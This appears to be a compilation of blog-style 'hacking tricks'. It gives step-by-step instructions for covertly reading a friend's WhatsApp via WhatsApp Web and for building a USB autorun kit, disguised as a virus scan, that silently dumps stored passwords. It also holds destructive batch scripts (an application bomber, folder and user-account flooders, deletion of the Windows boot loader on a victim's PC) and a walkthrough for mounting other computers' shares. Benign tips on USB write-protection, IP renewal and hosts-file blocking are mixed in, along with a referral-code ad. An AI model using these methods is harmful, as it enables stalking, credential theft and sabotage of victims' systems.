How To Track/Hack WhatsApp Account of your Friend Easily


Here, I am going to show you a trick in which you can use to track/hack Friend’s WhatsApp in your mobile without interrupting your own WhatsApp account. This Trick is very simple & even a little boy can use it very easily.


In Today’s world, there are numbers of people using free Whatsapp online chatting app on their phones; that’s why people also look for tracking spyware to read someone’s messages history. Now you can check these hacking options by yourself. So Follow the below steps to use this trick.



How To Hack WhatsApp of your Friend?

1- Open web.whatsapp.com in Chrome browser of your mobile.


2. It will redirect you to the www.whatsapp.com website.


3. It is the mobile website. Open Chrome menu & tick mark on the “Request desktop site” button in the menu.


4. Then it will show the original desktop site on your mobile. Here QR code will be displayed, which requires being scanned to use any of the WhatsApp accounts.

Note: Do Not Forget to tick mark the “Keep me signed in” option.




5. Take your friend’s mobile for five minutes. Open his/her WhatsApp & Click on Whatsapp web from the menu.





6. Then it will ask you scan the QR code. Scan the QR code which is discussed in Step 4.


7. That is it. Now you can use your friend’s WhatsApp till he/she doesn’t log out from WhatsApp web from his/her phone.

See below the screenshot of my friend’s WhatsApp Account on my phone.





Some Benefits of WhatsApp Tracing?

There is a large difference between hacking & spying. First one is illegal & made for wrong activities, but staying on cellphones of personal relations or employees becomes a reason to have their trace.

One’s children might be saved from going on the evil path if they are under monitoring. The employees show further fertility in work and don’t involve in any third company communications or illegal activities, which may hurt the reputation of the company. If someone’s kids went wrong, they would be caught instantly by using WhatsApp monitoring spyware.



Some Important Points To Remember:

This Trick is just for Educational Purpose Only. Do not Try This Trick to Cheat Someone. We are not Responsible for any Fall/Damage.
If the user uninstalls his Whatsapp, then you no longer be able to hack his Whatsapp or Track it.
If the user is offline or having no internet access, then you will not receive the message.
Do comment below if you have any problem/query/opinion!

ADD MONEY TO PAYTM WALLET(latest)


1.Download  Noddycash app from play store
2.sign up
3. In referal code section type ”NODDY10”
4.verify mobile no and money is credited in 5 hours

How to Hack Passwords Using a USB Drive


USB Drive
As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox.
There exists many tools for recovering these passswords from their stored places. Using these tools and a USB pen-drive, you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit:
MessenPassRecovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassViewRecovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE PassviewIE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassViewRecovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more.
PasswordFoxPasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed:
Record Index, Web Site, User Name, Password, User Name Field and Password Field.

Preparing Your USB Drive for Password Hacking:

Here is a step by step procedure to create the password hacking toolkit:
You must temporarily disable your antivirus before following these steps.
  1. Download all the 5 tools, extract them and copy only the executable files (.exe files) onto your USB Pendrive.
    ie: Copy the files – mspass.exemailpv.exeiepv.exepspv.exe andpasswordfox.exe into your USB Drive.
  2. Create a new Notepad and write the following text into it:
    [autorun]
    open=launch.bat
    ACTION= Perform a Virus Scan
    save the Notepad and rename it from New Text Document.txt to autorun.inf. Now copy the autorun.inf file onto your USB pen-drive.
  3. Create another Notepad and write the following text onto it:
    start mspass.exe /stext mspass.txt
    start mailpv.exe /stext mailpv.txt
    start iepv.exe /stext iepv.txt
    start pspv.exe /stext pspv.txt
    start passwordfox.exe /stext passwordfox.txt
    
    Save the Notepad and rename it from New Text Document.txt to launch.bat.Copy the launch.bat file to your USB drive.
    Now your rootkit is ready and you are all set to sniff the passwords. You can use this pen-drive on on any computer to sniff the stored passwords. Just follow these steps:
    1. Insert the pen-drive and the auto-run window will pop-up. (This is because, we have created an auto-run pen-drive).
    2. In the pop-up window, select the first option (Perform a Virus Scan).
    3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
    4. Remove the pen-drive and you’ll see the stored passwords in the .TXTfiles.
This hack works on Windows 2000, XP, Vista and 7.
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

How to Write-Protect Your USB Flash Drive

Write Protect USB
Many a time, it becomes necessary for us to write protect our USB flash drive so as to protect it from viruses and other malware programs. As flash drives are so popular and most widely used to move data between computers, they are the prime target for attackers as a means to get infections spread around the computer world. Also, since USB drive is not a Read-Only Memory (ROM), the data inside it can easily be modified or deleted by malware programs.
But unfortunately, most of the new flash drives do not come with a write-protect feature as the manufacturers wish to cut down the cost of production. Hence, the only way to write-protect your USB flash drives is to enable this feature on your own computer.

Steps to Write-Protect Your USB Drive:

This can be done by adding a small entry to the Windows registry which acts as a switch that can be enabled to make use of the write protection or disabled to allow write access. Here we go:
  1. Open the Registry Editor (Open the “Run” dialog box, type regedit and hit “Enter”).
  2. Navigate to the following Registry key:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
    
    
    
  3. Create a New Key named as StorageDevicePolicies. To do this, right-click onControl, again click on New -> Key and name it as StorageDevicePolicies.
  4. Now right-click on  StorageDevicePolicies and create a New -> DWORD (32-bit) Value and name it as WriteProtect.
    Write-Protect USB Drive
  5. Double-click on WriteProtect and set the Value data to 1.
    Now the right-protection for USB drives is enabled on your computer (no restart required) and thus it would not be possible for anyone or any program to add/delete the contents from your USB flash drive. Any attempt to copy or download the files onto the USB drive will result in the following error message being displayed.
    USB-Write Protect ErrorUSB-Write Protect Error
To revert and remove the write-protection, all you need to do is just change theValue data for WriteProtect (Step-5) from 1 back to 0. Now write access to all the USB devices is re-enabled.

BATCH FILES

Application Bomber

@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop

This code when executed will start open different applications like paint,notepad,command prompt
repeatedly, irritating victim and ofcourse affecting performance.
 Folder flooder
@echo off
:x
md %random% // mak es directory/folder.
goto x
Here %random% is a variable that would generate a positive no. randomly.

 So this code would makestart creating folders whose name can be any random number

User account flooder

@echo off
:x
net user %random% /add //create user account
goto x

This code would start creating windows user accounts whose names could be any random numbers
 Deleting boot files
Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'.
Click apply
Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot
the windows.
Lets make a batch file to
delete this file from victim's computer and the windows will not start then.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr //delete ntldr file
After running this batch file , system will not reboot and a normal victim would definitely install the
windows again.


Hacking network Computer with cmd (commands)

Hi all members In this step by step tutorial you will learn about: How to Hack Network Computer using the command prompt.

Things to remember

* CP = Command Prompt
* HDs = Hard Drives

step by Step:

1. Open command prompt if it's block and you don't know how to get to it go to Using the command prompt under a limited account and then continue to step #2.

2. Once in command prompt type

c:\windows>nbtstat -a 203.195.136.156

(instead of the I.P. address type the real I.P. address or the name of the computer your trying to get to) and if you don't know how to get the name of the computer then go to what to do after hacking the C:\ drive and then continue to step #3.

3. Let say that it gives you this

NetBIOS Remote Machine Name Table

Name Type Status

---------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = 00-02-44-14-23-E6

The number <20> shows that the victim has enabled the File And Printer Sharing.

-------------------------------------

NOTE - If you do not get this number there are three possible answers

A. You do not get the number <20> . This shows that the victim has not enabled the File and Printer Sharing.

B. You get "Host Not found". This shows that the port 139 is closed or the ip address or computer name doesn't exist or the computer you are trying to get to is turned off.

C. its still doesn’t matter if you don't get the <20> because this is to hack hard drives and not printers

4. Now in command prompt type

c:\windows>net view \\203.195.136.156

Let's suppose we get the following output

Shared resources at \\203.195.136.156
The computer's name will be here

Share name Type Used as Comment

-------------------------------------------
CDISK Disk

The command completed successfully.

5. The name CDISK is one of the things that being shared on command prompt type (the word Disk at the side its just saying what the the thing being shared is a printer, disk or a file)

c:\windows>net use k: \\203.195.136.156\CDISK

You may replace k letter by any other letter, If the command is successful we will get the confirmation - The command was completed successfully

Now just double click on the My Computer icon on your desktop
and there will be a new drive there with the letter that you replaced K with.

Awesome VLC Media Player Trick





vlc tricks



In this tutorial i will share a simple trick yet interesting trick i came across while surfing on the internet. I will call it VLC Inception trick. This trick is simple and works on windows xp as well as windows 7. If you know this trick then its great if you don't then lets dive into it.

How To Do This Trick ?

  1. Open Vlc Media Player.
  2. Then Press Cltr + N
  3. Now Type "Screen://" (without quotes)
  4. Click on Play and watch this simple little trick.

HOW TO HIDE FILE BEHIND THE IMAGES

There are some important  files or document you want to hide from others on your computer. To do that you might be creating folder inside folder to hide such files but in todays tutorial i will change this by teaching you a interesting trick to hide files behindimages.To hide a file behind a image  means that if any one opens that image he will see the image, but to see the hidden file we need to open that image in a specific way. So lets get started.

How To Hide File Behind Image ?

1. Select an image to be used for hiding file behind the image.
2. Now select a file to hide behind the image and make it in .RAR format. With the help of the WinRAR.
3. And most important is that paste both the files on desktop. You may do thisanywhere instead of desktop if you have some basic understanding of command line.
4. Now open cmd by going to Start > Accessories Command Prompt and type following commands in it.hide files behind images .
5. CD stands for change directory by typing above command you change your directory to desktop. After that type command given below.
 Copy /b imagename.jpg + filename.rar finalimage.jpg
hide files behind images
  • Replace imagename.jpg with the name of image you want your file to be hidden behind. Don't forget to add image format (Eg: .jpg,.png,.gif)
  • Replace filename with name of your file you want to hide. It must be in .rar format.
  • Finally Replace finalimage.jpg with whatever name you want your final image with hidden files should be. This is the image where your file will be hidden.
6. Now when you will try to open this newly created image it will open as normal image, but to open you hidden file you need follow steps given below.

How To Access Hidden File ?

To access your hidden file you need to open the newly created image in winrar. Just follow simple steps given below to do that.

    1. Open winrar
    2. Now locate your image and open it or simply drag your image in winrar.
    3. Extract the file and done.

CHANGE YOUR IP IN LESS THAN 1 MINUTE






 Now i m telling here how to change ip address in less then a minute. For now it will take 2 to 3 minutes but with some practice you can do this within a minute.
  • Click on "Start" in the bottom left corner of the screen.
  • Click on "RUN"
  • Type in "command" and click OK

      You should be now at MSDOS prompt Screen

  • Type "ipconfig /release" just like that, and press "enter"
  • Type "exit" and leave the prompt
  • Right-click on "Network Places" or "My Network Places" on your desktop.
  • Click on "properties"
  •   Now you should  be on a screen with something titled "Local Area Connection", or something  similar to that, and, if you have a network hooked up, all of your other networks.

    •  Right click on "Local Area Connection" and click "properties"
    • Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
    • Click on "Use the following IP address" under the "General" tab
    • Create an IP address (It doesn't matter what it is)
    • Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
    • Press the "Ok" button here
    • Hit the "Ok" button again 
    •  Now you should be back to the "Local Area Connection" screen.

      • Right-click back on "Local Area Connection" and go to properties again.
      • Go back to the "TCP/IP" settings
      • This time, select "Obtain an IP address automatically"
      • Click on "Ok"
      • Hit "Ok" again.
      • Now you have a New IP address.

COOL TRICKS WITH CHROME DEVELPOER TOOL

Simple Cool Tricks With Chrome Developer Tool


As you probably know, there is a button on the right-click menu of Google Chrome and IE 10+ called ''Inspect element''. This the developer tool. And you can have a lot of fun with it. I'll give you two examples on how to use it in this tutorial.

1. Change the text of a webpage:

You can have fun on webpages just by changing the value of a  (a text label). For example, go on the 4shared.com site (a free file sharing site). Then create an account if you don't have one (or just connect with Google, Facebook or Twitter). When you are done, upload something that is heavy (more than 100 MB) by dragging and dropping it on the home page of 4shared. Then you can see an uploading status window on the screen. So right-click on the percentage and click on ''Inspect element''. Now you can see a little window that appears on the bottom of the web browser. There are to ways : either you got the number or you got the % symbol. If you got the number, try to find the symbol below. Then double-click on it and type what you want (Eg: '',000,000 dollars in my bank account'')
google chrome tricks

2. Get a Non-Crypted password in JS/PhP code:

Some sites are not very safe and just verify the password directly in the PhP/JS code. Then, even if it become rare, you can get the password. Just follow these steps :

  1. Find the login form on the website you want to hack
  2. Right-click on it and then click on ''Inspect element''
  3. Search on the window that appeared ''
  4. After it, there is a URL, If it ends by ''.js'', just copy it and paste it in the URL bar of your browser
  5. If it ends by ''.php'', type ''view-source:'' before pasting the URL
  6. Then search something like ''password'' in the code.
WARNING: This method works better with JS than with PHP. Sometimes, there is no URL after ''action='' but just a JS function. Then you have to press Ctrl+U to see the source and search for ''password'' in the whole code.

HOW TO BLOCK ANY WEBSITE ON YOUR PC

How to Block a Website on your computer


If you want to block any website from any machine, you need to change the setting. Though it is not hard to configure and will work across browsers.
1. From your PC, open Windows Explorer and navigate to drive where Windows are installed, C:\Windows\System32\drivers\etc.
2. Under etc folder, go to hosts or you could even type C:\Winodws\System32\etc\hosts from Command prompt
pc1

3. Double Click on hosts, it will ask you to choose a Program, choose notepad. Or of you don’t get the option of Notepad, do it manually. Click File and the right-click then open tat file to notepad.
4. On the Notepad, you will see some lines of code, don’t play or edit them. Keep them as they are and just scroll down at the bottom of the last time.
pc2
5. At the last time, you will get 127.0.01 localhost. You have to add few new lines that will resemble the blocked websites.
6. Type 127.0.0.1 and then tap for space and then type address of the website that you want to block.
blockkkkk